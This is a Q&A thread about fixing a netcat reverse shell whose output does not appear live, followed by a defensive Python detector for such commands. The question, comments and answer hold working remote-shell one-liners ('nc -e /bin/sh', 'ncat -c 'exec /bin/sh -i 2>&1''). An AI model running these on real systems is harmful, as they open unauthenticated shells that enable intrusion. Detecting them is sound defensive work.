
Okay, so I am working on a reverse shell for my computer so that if anything were to happen, I could get back in and fix it. I used the command nc -nvlp 1234 on the PC, and on the other one I run nc -e /bin/sh <ip> 1234. Using this, I can connect to the computer and use the shell remotely. For some reason, I can't see replies from the shell unless the connection is closed by the host. How can I make this show live replies from the shell? E.g.:

~$ nc -e /bin/sh <ip> 1234
help
GNU bash, version 4.4.23(1)-release (x86_64-pc-linux-gnu)
These shell commands are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.

A star (*) next to a name means that the command is disabled.

 job_spec [&]                                                history [-c] [-d offset] [n] or history -anrw [filename]>
 (( expression ))                                            if COMMANDS; then COMMANDS; [ elif COMMANDS; then COMMAN>
 . filename [arguments]                                      jobs [-lnprs] [jobspec ...] or jobs -x command [args]
 :                                                           kill [-s sigspec | -n signum | -sigspec] pid | jobspec .>
 [ arg... ]                                                  let arg [arg ...]
 [[ expression ]]                                            local [option] name[=value] ...
 alias [-p] [name[=value] ... ]                              logout [n]
 bg [job_spec ...]                                           mapfile [-d delim] [-n count] [-O origin] [-s count] [-t>
 bind [-lpsvPSVX] [-m keymap] [-f filename] [-q name] [-u >  popd [-n] [+N | -N]
 break [n]                                                   printf [-v var] format [arguments]
 builtin [shell-builtin [arg ...]]                           pushd [-n] [+N | -N | dir]
 caller [expr]                                               pwd [-LP]
 case WORD in [PATTERN [| PATTERN]...) COMMANDS ;;]... esa>  read [-ers] [-a array] [-d delim] [-i text] [-n nchars] >
 cd [-L|[-P [-e]] [-@]] [dir]                                readarray [-n count] [-O origin] [-s count] [-t] [-u fd]>
 command [-pVv] command [arg ...]                            readonly [-aAf] [name[=value] ...] or readonly -p
 compgen [-abcdefgjksuv] [-o option] [-A action] [-G globp>  return [n]
 complete [-abcdefgjksuv] [-pr] [-DE] [-o option] [-A acti>  select NAME [in WORDS ... ;] do COMMANDS; done
 compopt [-o|+o option] [-DE] [name ...]                     set [-abefhkmnptuvxBCHP] [-o option-name] [--] [arg ...]
 continue [n]                                                shift [n]
 coproc [NAME] command [redirections]                        shopt [-pqsu] [-o] [optname ...]
 declare [-aAfFgilnrtux] [-p] [name[=value] ...]             source filename [arguments]
 dirs [-clpv] [+N] [-N]                                      suspend [-f]
 disown [-h] [-ar] [jobspec ... | pid ...]                   test [expr]
 echo [-neE] [arg ...]                                       time [-p] pipeline
 enable [-a] [-dnps] [-f filename] [name ...]                times
 eval [arg ...]                                              trap [-lp] [[arg] signal_spec ...]
 exec [-cl] [-a name] [command [arguments ...]] [redirecti>  true
 exit [n]                                                    type [-afptP] name [name ...]
 export [-fn] [name[=value] ...] or export -p                typeset [-aAfFgilnrtux] [-p] name[=value] ...
 false                                                       ulimit [-SHabcdefiklmnpqrstuvxPT] [limit]
 fc [-e ename] [-lnr] [first] [last] or fc -s [pat=rep] [c>  umask [-p] [-S] [mode]
 fg [job_spec]                                               unalias [-a] name [name ...]
 for NAME [in WORDS ... ] ; do COMMANDS; done                unset [-f] [-v] [-n] [name ...]
 for (( exp1; exp2; exp3 )); do COMMANDS; done               until COMMANDS; do COMMANDS; done
 function name { COMMANDS ; } or name () { COMMANDS ; }      variables - Names and meanings of some shell variables
 getopts optstring name [arg]                                wait [-n] [id ...]
 hash [-lr] [-p pathname] [-dt] [name ...]                   while COMMANDS; do COMMANDS; done
 help [-dms] [pattern ...]

Instead of doing that, the shell won't show it unless the host shuts down the connection while I am still connected.

Derek Haber
  • This sounds quite dangerous from a security perspective. Why not connect with SSH instead? – ewramner Mar 12 '19 at 16:50
  • Note that /bin/sh sends prompts to stderr, so you should be doing something like `nc -c '/bin/sh -i 2>&1' IP 1234`. You do realise that the commands are supposed to be typed into the listening nc, not the one running `sh`? As commented above, unencrypted connections are really dangerous. – jhnc Mar 13 '19 at 00:33
  • @ewramner Because that would be brute-forced too easily, as netcat results won't appear via an nmap scan. jww, I will move there, my apologies, and jhnc, I got the same problem with that. – Derek Haber Mar 13 '19 at 14:23
  • Security through obscurity is seldom good. You will still be found by a scan, it just has to be a bit more advanced and when they find you they are in. Brute-forcing SSH with public key authentication rather than passwords is not easy. If you like you can use another port than 22 to avoid the really simple scans, but again that won't protect you much. Still, your decision - good luck! – ewramner Mar 13 '19 at 15:14
  • @ewramner This is for study purposes; I want to do my own research on the security benefits and downfalls of my decision. I need to figure out how I can do this, so I can continue my studies. – Derek Haber Mar 15 '19 at 12:58

1 Answer


The problem is that your shell command is being executed on the wrong end. If you want to establish a remote shell, it should be the server creating the shell, not the client. The output you see is actually not coming from the server you connected to, but rather the shell where you ran the client command.

Here is a proper way to establish a reverse shell using ncat:

Server:

ncat -nvlp 1234 -c 'exec /bin/sh -i 2>&1'

Client:

ncat localhost 1234

This setup ensures that when the client connects, the server drops it into a shell.

smac89
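From the defender's side, the two command shapes on this page (nc -e /bin/sh on the connecting host, ncat -l ... -c 'exec /bin/sh -i 2>&1' on the listening host) are exactly what a process-start log should flag. The following detector is an added example, not code from the question or answer; the log format ("pid user cmdline") and the sample events are constructed for illustration. It tags whether the shell is spawned on the listening side (a bind shell) or the connecting side (a reverse shell), and whether the '-i 2>&1' interactive/stderr fix from the comments is present.

```python
import re
import shlex

# Constructed sample process-start records (not from the page): "pid user cmdline"
SAMPLE_EVENTS = [
    "4011 derek nc -nvlp 1234",
    "4012 derek nc -e /bin/sh 192.0.2.10 1234",
    "4020 smac ncat -nvlp 1234 -c 'exec /bin/sh -i 2>&1'",
    "4021 smac ncat localhost 1234",
    "4030 ops nc -zv db.example.internal 5432",
]

NETCAT_NAMES = {"nc", "ncat", "netcat"}
EXEC_OPTS = {"-e", "-c", "--exec", "--sh-exec"}
SHELL_RE = re.compile(r"(^|/)(sh|bash|dash|zsh)$")


def classify(cmdline):
    """Return None unless cmdline is netcat handing its socket to a program.

    Otherwise return which side spawns the program (listener = bind shell,
    connector = reverse shell) and whether '-i' and '2>&1' are present.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None  # unbalanced quotes: not parseable as a shell command
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listening, program = False, None
    for i, arg in enumerate(argv):
        if arg == "--listen" or (arg.startswith("-") and not arg.startswith("--") and "l" in arg[1:]):
            listening = True  # -l may be bundled with other short flags, e.g. -nvlp
        elif arg in EXEC_OPTS and i + 1 < len(argv):
            program = argv[i + 1]
    if program is None:
        return None
    tokens = shlex.split(program)  # e.g. "exec /bin/sh -i 2>&1" -> 4 tokens
    shell = next((t for t in tokens if SHELL_RE.search(t)), None)
    return {
        "role": "bind" if listening else "reverse",
        "shell": shell,
        "interactive": "-i" in tokens,
        "stderr_merged": "2>&1" in tokens,
    }


def scan(events):
    """Return (pid, user, classification) for every flagged event."""
    hits = []
    for line in events:
        pid, user, cmdline = line.split(maxsplit=2)
        verdict = classify(cmdline)
        if verdict:
            hits.append((int(pid), user, verdict))
    return hits
```

Plain listeners and plain connectors (events 4011, 4021, 4030) are not flagged; only the two commands that attach a shell to the socket are.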